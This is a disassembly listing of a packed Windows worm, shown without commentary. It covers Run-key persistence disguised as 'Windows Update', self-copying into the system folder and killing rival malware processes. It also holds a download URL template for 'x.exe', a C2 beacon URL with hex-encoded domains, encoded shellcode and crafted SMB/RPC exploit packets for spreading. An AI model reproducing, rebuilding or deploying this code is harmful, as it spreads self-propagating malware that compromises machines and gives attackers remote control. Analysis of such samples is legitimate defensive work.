call dword_309010D4 ; InterlockedIncrement
push edi
call sub_309017D2
test eax, eax
pop ecx
jnz short loc_309026BA
push edi
push offset sub_30902536
call sub_30901F23
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_3090269F: ; CODE XREF: sub_30902622+8D�j
push edi
push offset sub_3090259A
call sub_30901F23
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_3090269F
jmp short loc_309026BA
; ---------------------------------------------------------------------------
loc_309026B3: ; CODE XREF: sub_30902622+51�j
push 2710h
call ebx ; Sleep
loc_309026BA: ; CODE XREF: sub_30902622+67�j
; sub_30902622+8F�j
movzx edi, word_30904FDC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_3090236F
test eax, eax
jz loc_30902648
pop edi
pop esi
pop ebx
loc_309026DB: ; CODE XREF: sub_30902622+11�j
push 0
call dword_309010D0 ; ExitThread
xor eax, eax
leave
retn 4
sub_30902622 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309026E9 proc near ; CODE XREF: UPX0:309027B7�p
; UPX0:loc_3090281D�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_30901FCA
push eax
call dword_3090115C ; inet_ntoa
mov esi, dword_30901068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpyA
push dword_30904FCC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3090111C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_309042BA
call esi ; lstrcpyA
push offset byte_309042B8
call dword_30901084 ; lstrlenA
mov byte_309042B8[eax], 0DFh
pop esi
leave
retn
sub_309026E9 endp
; ---------------------------------------------------------------------------
loc_30902745: ; DATA XREF: sub_30902383+16C�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_30904FD4, ebx
call sub_30902009
mov esi, dword_30901094
mov edi, 1388h
test eax, eax
jnz short loc_30902773
loc_30902767: ; CODE XREF: UPX0:30902771�j
push edi
call esi ; Sleep
call sub_30902009
test eax, eax
jz short loc_30902767
loc_30902773: ; CODE XREF: UPX0:30902765�j
lea eax, [esp+14h]
push ebx
push eax
call dword_30901130 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_30904FD8, ebx
pop ebp
mov word_30904FDC, 96h
jz short loc_309027B0
mov dword_30904FD8, 1
mov ebp, 15Eh
mov word_30904FDC, 14h
loc_309027B0: ; CODE XREF: UPX0:30902796�j
call sub_30901FCA
mov ebx, eax
call sub_309026E9
cmp ebx, 100007Fh
jz short loc_309027D1
push ebx
push offset sub_30902536
call sub_30901F23
pop ecx
pop ecx
loc_309027D1: ; CODE XREF: UPX0:309027C2�j
mov dword ptr [esp+10h], 4
loc_309027D9: ; CODE XREF: UPX0:309027EA�j
push ebx
push offset sub_3090259A
call sub_30901F23
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_309027D9
test ebp, ebp
jle short loc_30902801
loc_309027F0: ; CODE XREF: UPX0:309027FF�j
push 0
push offset sub_30902622
call sub_30901F23
pop ecx
dec ebp
pop ecx
jnz short loc_309027F0
loc_30902801: ; CODE XREF: UPX0:309027EE�j
; UPX0:3090280D�j ...
call sub_30902009
test eax, eax
jz short loc_3090280F
push edi
call esi ; Sleep
jmp short loc_30902801
; ---------------------------------------------------------------------------
loc_3090280F: ; CODE XREF: UPX0:30902808�j
; UPX0:3090281B�j
call sub_30902009
test eax, eax
jnz short loc_3090281D
push edi
call esi ; Sleep
jmp short loc_3090280F
; ---------------------------------------------------------------------------
loc_3090281D: ; CODE XREF: UPX0:30902816�j
call sub_309026E9
jmp short loc_30902801
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902824 proc near ; CODE XREF: sub_309029BD+8C�p
; sub_30902B37+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3090100C ; RegOpenKeyExA
test eax, eax
jnz short loc_30902857
push [ebp+arg_8]
push [ebp+arg_4]
call dword_30901010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_30901014 ; RegCloseKey
loc_30902857: ; CODE XREF: sub_30902824+1C�j
pop ebp
retn
sub_30902824 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902859 proc near ; CODE XREF: sub_30902195+33�p
; sub_309029BD+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3090100C ; RegOpenKeyExA
test eax, eax
jz short loc_30902885
push 1
pop eax
jmp short loc_309028AF
; ---------------------------------------------------------------------------
loc_30902885: ; CODE XREF: sub_30902859+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_30901008 ; RegQueryValueExA
test eax, eax
jz short loc_309028A4
push 2
pop esi
loc_309028A4: ; CODE XREF: sub_30902859+46�j
push [ebp+arg_10]
call dword_30901014 ; RegCloseKey
mov eax, esi
loc_309028AF: ; CODE XREF: sub_30902859+2A�j
pop esi
leave
retn
sub_30902859 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309028B2 proc near ; CODE XREF: sub_30902A6B+96�p
; sub_30902B37+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_30901000 ; RegCreateKeyExA
test eax, eax
jz short loc_309028DB
push 1
pop eax
jmp short loc_30902902
; ---------------------------------------------------------------------------
loc_309028DB: ; CODE XREF: sub_309028B2+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_30901004 ; RegSetValueExA
test eax, eax
jz short loc_309028F7
push 2
pop esi
loc_309028F7: ; CODE XREF: sub_309028B2+40�j
push [ebp+arg_4]
call dword_30901014 ; RegCloseKey
mov eax, esi
loc_30902902: ; CODE XREF: sub_309028B2+27�j
pop esi
pop ebp
retn
sub_309028B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902905 proc near ; CODE XREF: sub_309029BD+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_30901084 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_309029B9
loc_30902925: ; CODE XREF: sub_30902905+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_3090292E
dec esi
jns short loc_30902925
loc_3090292E: ; CODE XREF: sub_30902905+24�j
push 0
push 2
call sub_30902CFC ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_309029B9
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_30902CA6 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_30902CF6 ; Process32First
test eax, eax
jz short loc_309029B9
lea esi, [esi+ebx+1]
loc_30902976: ; CODE XREF: sub_30902905+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_30901104 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_309029A6
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_309010B0 ; OpenProcess
push 0
push eax
call dword_30901060 ; TerminateProcess
loc_309029A6: ; CODE XREF: sub_30902905+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_30902CF0 ; Process32Next
test eax, eax
jnz short loc_30902976
loc_309029B9: ; CODE XREF: sub_30902905+1A�j
; sub_30902905+38�j ...
pop esi
pop ebx
leave
retn
sub_30902905 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309029BD proc near ; CODE XREF: UPX0:3090234C�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_30902A26: ; CODE XREF: sub_309029BD+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_30902859
add esp, 14h
test eax, eax
jnz short loc_30902A5D
push ebx
push edi
push esi
call sub_30902824
lea eax, [ebp+var_138]
push eax
call sub_30902905
add esp, 10h
loc_30902A5D: ; CODE XREF: sub_309029BD+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_30902A26
pop edi
pop esi
pop ebx
leave
retn
sub_309029BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902A6B proc near ; CODE XREF: sub_30902B37+D1�p
; sub_30902B37+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_30902A80
push [ebp+arg_0]
call dword_30901074 ; DeleteFileA
loc_30902A80: ; CODE XREF: sub_30902A6B+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3090108C ; GetSystemDirectoryA
test eax, eax
jz locret_30902B35
push esi
call dword_309010FC ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_30901F44
mov esi, dword_30901088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_309041F0
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset dword_309041F8
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_30901050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_30901084 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_309028B2
add esp, 14h
push dword_30904FC4
call dword_3090107C ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_30901054 ; WinExec
push 1F4h
call dword_30901094 ; Sleep
push 0
call dword_309010E0 ; ExitProcess
pop esi
locret_30902B35: ; CODE XREF: sub_30902A6B+23�j
leave
retn
sub_30902A6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902B37 proc near ; CODE XREF: UPX0:30902351�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_30901048 ; GetModuleFileNameA
test eax, eax
jz loc_30902C70
and dword_30904FE0, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_30902859
add esp, 14h
test eax, eax
jz short loc_30902BBD
call dword_309010FC ; rand
push 0Ah
mov ebx, offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_30901F44
pop ecx
pop ecx
push ebx
call dword_30901084 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_309028B2
add esp, 14h
jmp short loc_30902BCC
; ---------------------------------------------------------------------------
loc_30902BBD: ; CODE XREF: sub_30902B37+4D�j
lea eax, [ebp+var_20]
push eax
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
call dword_30901068 ; lstrcpyA
loc_30902BCC: ; CODE XREF: sub_30902B37+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_30902859
add esp, 14h
test eax, eax
jz short loc_30902C12
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_309028B2
lea eax, [ebp+var_84]
push eax
push 0
call sub_30902A6B
add esp, 1Ch
jmp short loc_30902C70
; ---------------------------------------------------------------------------
loc_30902C12: ; CODE XREF: sub_30902B37+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3090104C ; lstrcmpiA
test eax, eax
jnz short loc_30902C5B
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_30902859
add esp, 14h
test eax, eax
jnz short loc_30902C70
push ebx
push edi
push esi
mov dword_30904FE0, 1
call sub_30902824
add esp, 0Ch
jmp short loc_30902C70
; ---------------------------------------------------------------------------
loc_30902C5B: ; CODE XREF: sub_30902B37+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_30902A6B
pop ecx
pop ecx
loc_30902C70: ; CODE XREF: sub_30902B37+1F�j
; sub_30902B37+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_30902B37 endp
; =============== S U B R O U T I N E =======================================
sub_30902C75 proc near ; CODE XREF: sub_309011A0+CA�p
; sub_309015C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_30901044 ; VirtualAlloc
retn
sub_30902C75 endp
; =============== S U B R O U T I N E =======================================
sub_30902C89 proc near ; CODE XREF: sub_309011A0+10B�p
; sub_309015C7+BD�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_30901040 ; VirtualFree
retn
sub_30902C89 endp
; ---------------------------------------------------------------------------
align 10h
loc_30902CA0: ; DATA XREF: sub_30901422+A�o
; sub_30902383+A�o
jmp dword ptr loc_30901100
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CA6 proc near ; CODE XREF: sub_309017D2+128�p
; sub_309017D2+134�p ...
jmp dword_309010F8
sub_30902CA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CAC proc near ; CODE XREF: sub_309017D2+9C�p
; sub_309017D2+C5�p ...
jmp dword_309010F4
sub_30902CAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CB2 proc near ; CODE XREF: sub_309017D2+93�p
; sub_309017D2+B2�p ...
jmp dword_309010F0
sub_30902CB2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_30902CC0 proc near ; CODE XREF: sub_309017D2+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_30902CE0
loc_30902CCC: ; CODE XREF: sub_30902CC0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_30902CCC
loc_30902CE0: ; CODE XREF: sub_30902CC0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_30902CC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CF0 proc near ; CODE XREF: sub_30902905+AB�p
jmp dword_30901064
sub_30902CF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CF6 proc near ; CODE XREF: sub_30902905+64�p
jmp dword_3090105C
sub_30902CF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CFC proc near ; CODE XREF: sub_30902905+2D�p
jmp dword_30901058
sub_30902CFC endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4BFh dup(0)
dword_30904000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_30901422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_309015C7+84�o
align 10h
byte_30904080 db 0 ; DATA XREF: sub_3090169C+C�r
off_30904081 dd offset dword_309041E4 ; DATA XREF: sub_3090169C+14�r
align 2
dd offset dword_309041D4
dw 0C401h
dd 1309041h, 309041B4h, 9041A000h, 41900130h, 80013090h
dd 309041h, 30904174h, 90416800h, 41580130h, 48003090h
dd 1309041h, 3090413Ch, 90417400h, 41D40130h, 30003090h
dd 309041h, 309041D4h, 90412001h, 41480030h, 10013090h
dd 309041h, 30904130h, 90410001h, 40F80130h, 74003090h
dd 309041h, 30904130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_309041D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_309041E4 dd 617A616Dh, 616B6166h, 75722Ehdword_309041F0 dd 6578652Eh, 0 ; sub_3090204F+55�o ...
dword_309041F8 dd 5Ch ; sub_30902A6B+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_309011A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_30901316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_30901316+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_30901422+34�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_309015C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=17&cnt=%s',0
; DATA XREF: sub_309015C7+57�o
align 8
byte_309042B8 db 0EBh ; DATA XREF: sub_309017D2+24E�o
; sub_309017D2+260�o ...
db 58h
word_309042BA dw 7468h ; DATA XREF: sub_309026E9+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999AEh, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_30904580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_309017D2+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3090460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_309046B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_30904798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_309017D2+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_309047FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_30904868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3090490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_3090498C dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_30904A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_30904A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_30904B00 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_30904BBE dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_30904BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_309017D2+41B�o
; sub_309017D2+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_30904C70: ; DATA XREF: sub_309017D2+44A�o
jmp short loc_30904C78
; ---------------------------------------------------------------------------
jmp short loc_30904C7A
; ---------------------------------------------------------------------------
align 8
loc_30904C78: ; CODE XREF: UPX0:loc_30904C70�j
; DATA XREF: sub_309017D2+5C�o
pop esp
pop esp
loc_30904C7A: ; CODE XREF: UPX0:30904C72�j
